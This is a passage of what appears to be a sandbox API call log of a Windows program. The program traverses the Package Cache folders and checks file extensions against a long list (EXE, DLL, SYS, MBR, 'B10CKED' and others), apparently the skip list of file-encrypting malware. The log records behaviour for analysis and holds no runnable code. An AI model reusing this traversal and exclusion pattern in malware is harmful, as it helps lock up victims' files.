CACHE\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\PACKAGES\\PATCH\\") returned 0x59 [0110.149] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\Patch\\", cchLength=0x59 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\PACKAGES\\PATCH\\") returned 0x59 [0110.149] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\Patch\\", cchLength=0x59 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\PACKAGES\\PATCH\\") returned 0x59 [0110.150] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\Patch\\", cchLength=0x59 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\PACKAGES\\PATCH\\") returned 0x59 [0110.150] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package 
Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\Patch\\", cchLength=0x59 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\PACKAGES\\PATCH\\") returned 0x59 [0110.150] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\Patch\\", cchLength=0x59 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\PACKAGES\\PATCH\\") returned 0x59 [0110.150] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\Patch\\", cchLength=0x59 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\PACKAGES\\PATCH\\") returned 0x59 [0110.150] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\Patch\\", cchLength=0x59 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\PACKAGES\\PATCH\\") returned 0x59 [0110.150] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\Patch\\", cchLength=0x59 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\PACKAGES\\PATCH\\") returned 0x59 [0110.150] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\Patch\\", cchLength=0x59 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\PACKAGES\\PATCH\\") returned 0x59 [0110.150] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\Patch\\*.*", lpFindFileData=0x12e908 | out: lpFindFileData=0x12e908) returned 0x1c7fe8 [0110.150] FindNextFileW (in: hFindFile=0x1c7fe8, lpFindFileData=0x12e908 | out: lpFindFileData=0x12e908) returned 1 [0110.151] FindNextFileW (in: hFindFile=0x1c7fe8, 
lpFindFileData=0x12e908 | out: lpFindFileData=0x12e908) returned 1 [0110.151] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\Patch\\x86\\", cchLength=0x5d | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\PACKAGES\\PATCH\\X86\\") returned 0x5d [0110.151] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\Patch\\x86\\", cchLength=0x5d | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\PACKAGES\\PATCH\\X86\\") returned 0x5d [0110.151] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\Patch\\x86\\", cchLength=0x5d | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\PACKAGES\\PATCH\\X86\\") returned 0x5d [0110.151] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\Patch\\x86\\", cchLength=0x5d | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\PACKAGES\\PATCH\\X86\\") returned 0x5d [0110.151] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\Patch\\x86\\", cchLength=0x5d | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\PACKAGES\\PATCH\\X86\\") returned 0x5d [0110.151] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\Patch\\x86\\", cchLength=0x5d | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\PACKAGES\\PATCH\\X86\\") returned 0x5d [0110.151] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\Patch\\x86\\", cchLength=0x5d | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE 
CACHE\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\PACKAGES\\PATCH\\X86\\") returned 0x5d [0110.151] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\Patch\\x86\\", cchLength=0x5d | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\PACKAGES\\PATCH\\X86\\") returned 0x5d [0110.151] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\Patch\\x86\\", cchLength=0x5d | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\PACKAGES\\PATCH\\X86\\") returned 0x5d [0110.151] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\Patch\\x86\\", cchLength=0x5d | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\PACKAGES\\PATCH\\X86\\") returned 0x5d [0110.151] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\Patch\\x86\\", cchLength=0x5d | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\PACKAGES\\PATCH\\X86\\") returned 0x5d [0110.151] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\Patch\\x86\\", cchLength=0x5d | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\PACKAGES\\PATCH\\X86\\") returned 0x5d [0110.151] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\Patch\\x86\\", cchLength=0x5d | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\PACKAGES\\PATCH\\X86\\") returned 0x5d [0110.151] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\Patch\\x86\\", cchLength=0x5d | out: lpsz="C:\\USERS\\ALL 
USERS\\PACKAGE CACHE\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\PACKAGES\\PATCH\\X86\\") returned 0x5d [0110.151] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\Patch\\x86\\", cchLength=0x5d | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\PACKAGES\\PATCH\\X86\\") returned 0x5d [0110.151] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\Patch\\x86\\", cchLength=0x5d | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\PACKAGES\\PATCH\\X86\\") returned 0x5d [0110.151] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\Patch\\x86\\", cchLength=0x5d | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\PACKAGES\\PATCH\\X86\\") returned 0x5d [0110.151] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\Patch\\x86\\", cchLength=0x5d | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\PACKAGES\\PATCH\\X86\\") returned 0x5d [0110.151] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\Patch\\x86\\*.*", lpFindFileData=0x12e644 | out: lpFindFileData=0x12e644) returned 0x1c8028 [0110.151] FindNextFileW (in: hFindFile=0x1c8028, lpFindFileData=0x12e644 | out: lpFindFileData=0x12e644) returned 1 [0110.152] FindNextFileW (in: hFindFile=0x1c8028, lpFindFileData=0x12e644 | out: lpFindFileData=0x12e644) returned 1 [0110.152] CharUpperBuffW (in: lpsz="msu", cchLength=0x3 | out: lpsz="MSU") returned 0x3 [0110.152] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AST", cchCount1=3, lpString2="MSU", cchCount2=3) returned 1 [0110.152] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AFN", 
cchCount1=3, lpString2="MSU", cchCount2=3) returned 1 [0110.152] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ELST", cchCount1=4, lpString2="MSU", cchCount2=3) returned 1 [0110.152] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EXE", cchCount1=3, lpString2="MSU", cchCount2=3) returned 1 [0110.152] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNK", cchCount1=3, lpString2="MSU", cchCount2=3) returned 1 [0110.152] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTA", cchCount1=3, lpString2="MSU", cchCount2=3) returned 1 [0110.152] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PEK", cchCount1=3, lpString2="MSU", cchCount2=3) returned 3 [0110.152] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="MSU", cchCount2=3) returned 3 [0110.152] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="B10CKED", cchCount1=7, lpString2="MSU", cchCount2=3) returned 1 [0110.152] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="MSU", cchCount2=3) returned 3 [0110.152] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="MSU", cchCount2=3) returned 1 [0110.152] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="000", cchCount1=3, lpString2="MSU", cchCount2=3) returned 1 [0110.152] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SYS", cchCount1=3, lpString2="MSU", cchCount2=3) returned 3 [0110.152] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="MSU", cchCount2=3) returned 1 [0110.152] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RTF", cchCount1=3, lpString2="MSU", cchCount2=3) returned 3 [0110.155] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INF", cchCount1=3, lpString2="MSU", cchCount2=3) returned 1 [0110.155] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DLL", cchCount1=3, lpString2="MSU", cchCount2=3) returned 1 [0110.155] 
CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="MSU", cchCount2=3) returned 1 [0110.155] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="REG", cchCount1=3, lpString2="MSU", cchCount2=3) returned 3 [0110.155] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DRV", cchCount1=3, lpString2="MSU", cchCount2=3) returned 1 [0110.155] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DEV", cchCount1=3, lpString2="MSU", cchCount2=3) returned 1 [0110.155] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PIF", cchCount1=3, lpString2="MSU", cchCount2=3) returned 3 [0110.155] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MBR", cchCount1=3, lpString2="MSU", cchCount2=3) returned 1 [0110.155] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INI", cchCount1=3, lpString2="MSU", cchCount2=3) returned 1 [0110.155] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XML", cchCount1=3, lpString2="MSU", cchCount2=3) returned 3 [0110.155] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LIST", cchCount1=4, lpString2="MSU", cchCount2=3) returned 1 [0110.155] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TTF", cchCount1=3, lpString2="MSU", cchCount2=3) returned 3 [0110.155] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG", cchCount1=3, lpString2="MSU", cchCount2=3) returned 1 [0110.155] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JA", cchCount1=2, lpString2="MSU", cchCount2=3) returned 1 [0110.155] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="COM", cchCount1=3, lpString2="MSU", cchCount2=3) returned 1 [0110.155] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BAT", cchCount1=3, lpString2="MSU", cchCount2=3) returned 1 [0110.155] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CMD", cchCount1=3, lpString2="MSU", cchCount2=3) returned 1 [0110.155] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VBS", cchCount1=3, 
lpString2="MSU", cchCount2=3) returned 3 [0110.155] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JS", cchCount1=2, lpString2="MSU", cchCount2=3) returned 1 [0110.155] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CFG", cchCount1=3, lpString2="MSU", cchCount2=3) returned 1 [0110.155] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DOWNLOAD", cchCount1=8, lpString2="MSU", cchCount2=3) returned 1 [0110.155] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NFO", cchCount1=3, lpString2="MSU", cchCount2=3) returned 3 [0110.155] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MSI", cchCount1=3, lpString2="MSU", cchCount2=3) returned 1 [0110.155] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CHK", cchCount1=3, lpString2="MSU", cchCount2=3) returned 1 [0110.155] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DMP", cchCount1=3, lpString2="MSU", cchCount2=3) returned 1 [0110.155] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MUI", cchCount1=3, lpString2="MSU", cchCount2=3) returned 3 [0110.155] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DUN", cchCount1=3, lpString2="MSU", cchCount2=3) returned 1 [0110.155] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISP", cchCount1=3, lpString2="MSU", cchCount2=3) returned 1 [0110.155] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISW", cchCount1=3, lpString2="MSU", cchCount2=3) returned 1 [0110.155] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CAB", cchCount1=3, lpString2="MSU", cchCount2=3) returned 1 [0110.155] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EFI", cchCount1=3, lpString2="MSU", cchCount2=3) returned 1 [0110.155] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HLP", cchCount1=3, lpString2="MSU", cchCount2=3) returned 1 [0110.155] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MSU", cchCount1=3, lpString2="MSU", cchCount2=3) returned 2 [0110.155] FindNextFileW (in: 
hFindFile=0x1c8028, lpFindFileData=0x12e644 | out: lpFindFileData=0x12e644) returned 0 [0110.155] FindClose (in: hFindFile=0x1c8028 | out: hFindFile=0x1c8028) returned 1 [0110.156] FindNextFileW (in: hFindFile=0x1c7fe8, lpFindFileData=0x12e908 | out: lpFindFileData=0x12e908) returned 0 [0110.156] FindClose (in: hFindFile=0x1c7fe8 | out: hFindFile=0x1c7fe8) returned 1 [0110.156] FindNextFileW (in: hFindFile=0x1c7fa8, lpFindFileData=0x12ebcc | out: lpFindFileData=0x12ebcc) returned 0 [0110.156] FindClose (in: hFindFile=0x1c7fa8 | out: hFindFile=0x1c7fa8) returned 1 [0110.156] FindNextFileW (in: hFindFile=0x1c7f68, lpFindFileData=0x12ee90 | out: lpFindFileData=0x12ee90) returned 0 [0110.156] FindClose (in: hFindFile=0x1c7f68 | out: hFindFile=0x1c7f68) returned 1 [0110.156] FindNextFileW (in: hFindFile=0x1c9688, lpFindFileData=0x12f154 | out: lpFindFileData=0x12f154) returned 1 [0110.156] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\", cchLength=0x4a | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\D4036846864773E3D647F421DFE7F6CA536E307B\\") returned 0x4a [0110.156] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\", cchLength=0x4a | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\D4036846864773E3D647F421DFE7F6CA536E307B\\") returned 0x4a [0110.156] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\", cchLength=0x4a | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\D4036846864773E3D647F421DFE7F6CA536E307B\\") returned 0x4a [0110.156] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\", cchLength=0x4a | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\D4036846864773E3D647F421DFE7F6CA536E307B\\") returned 0x4a [0110.156] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\", cchLength=0x4a | out: 
lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\D4036846864773E3D647F421DFE7F6CA536E307B\\") returned 0x4a [0110.156] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\", cchLength=0x4a | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\D4036846864773E3D647F421DFE7F6CA536E307B\\") returned 0x4a [0110.156] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\", cchLength=0x4a | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\D4036846864773E3D647F421DFE7F6CA536E307B\\") returned 0x4a [0110.156] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\", cchLength=0x4a | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\D4036846864773E3D647F421DFE7F6CA536E307B\\") returned 0x4a [0110.156] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\", cchLength=0x4a | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\D4036846864773E3D647F421DFE7F6CA536E307B\\") returned 0x4a [0110.156] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\", cchLength=0x4a | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\D4036846864773E3D647F421DFE7F6CA536E307B\\") returned 0x4a [0110.156] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\", cchLength=0x4a | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\D4036846864773E3D647F421DFE7F6CA536E307B\\") returned 0x4a [0110.156] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\", cchLength=0x4a | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\D4036846864773E3D647F421DFE7F6CA536E307B\\") returned 0x4a [0110.156] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\", cchLength=0x4a | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE 
CACHE\\D4036846864773E3D647F421DFE7F6CA536E307B\\") returned 0x4a [0110.156] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\", cchLength=0x4a | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\D4036846864773E3D647F421DFE7F6CA536E307B\\") returned 0x4a [0110.156] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\", cchLength=0x4a | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\D4036846864773E3D647F421DFE7F6CA536E307B\\") returned 0x4a [0110.156] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\", cchLength=0x4a | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\D4036846864773E3D647F421DFE7F6CA536E307B\\") returned 0x4a [0110.156] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\", cchLength=0x4a | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\D4036846864773E3D647F421DFE7F6CA536E307B\\") returned 0x4a [0110.156] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\", cchLength=0x4a | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\D4036846864773E3D647F421DFE7F6CA536E307B\\") returned 0x4a [0110.156] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\*.*", lpFindFileData=0x12ee90 | out: lpFindFileData=0x12ee90) returned 0x1c7f68 [0110.169] FindNextFileW (in: hFindFile=0x1c7f68, lpFindFileData=0x12ee90 | out: lpFindFileData=0x12ee90) returned 1 [0110.169] FindNextFileW (in: hFindFile=0x1c7f68, lpFindFileData=0x12ee90 | out: lpFindFileData=0x12ee90) returned 1 [0110.169] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages\\", cchLength=0x53 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\D4036846864773E3D647F421DFE7F6CA536E307B\\PACKAGES\\") returned 0x53 [0110.169] 
CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages\\", cchLength=0x53 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\D4036846864773E3D647F421DFE7F6CA536E307B\\PACKAGES\\") returned 0x53 [0110.169] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages\\", cchLength=0x53 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\D4036846864773E3D647F421DFE7F6CA536E307B\\PACKAGES\\") returned 0x53 [0110.169] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages\\", cchLength=0x53 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\D4036846864773E3D647F421DFE7F6CA536E307B\\PACKAGES\\") returned 0x53 [0110.169] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages\\", cchLength=0x53 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\D4036846864773E3D647F421DFE7F6CA536E307B\\PACKAGES\\") returned 0x53 [0110.169] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages\\", cchLength=0x53 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\D4036846864773E3D647F421DFE7F6CA536E307B\\PACKAGES\\") returned 0x53 [0110.169] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages\\", cchLength=0x53 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\D4036846864773E3D647F421DFE7F6CA536E307B\\PACKAGES\\") returned 0x53 [0110.169] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages\\", cchLength=0x53 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\D4036846864773E3D647F421DFE7F6CA536E307B\\PACKAGES\\") returned 0x53 [0110.169] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages\\", cchLength=0x53 | out: 
lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\D4036846864773E3D647F421DFE7F6CA536E307B\\PACKAGES\\") returned 0x53 [0110.169] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages\\", cchLength=0x53 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\D4036846864773E3D647F421DFE7F6CA536E307B\\PACKAGES\\") returned 0x53 [0110.169] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages\\", cchLength=0x53 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\D4036846864773E3D647F421DFE7F6CA536E307B\\PACKAGES\\") returned 0x53 [0110.169] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages\\", cchLength=0x53 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\D4036846864773E3D647F421DFE7F6CA536E307B\\PACKAGES\\") returned 0x53 [0110.169] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages\\", cchLength=0x53 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\D4036846864773E3D647F421DFE7F6CA536E307B\\PACKAGES\\") returned 0x53 [0110.169] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages\\", cchLength=0x53 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\D4036846864773E3D647F421DFE7F6CA536E307B\\PACKAGES\\") returned 0x53 [0110.170] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages\\", cchLength=0x53 | out: lpsz="C:\\USERS\\ALL 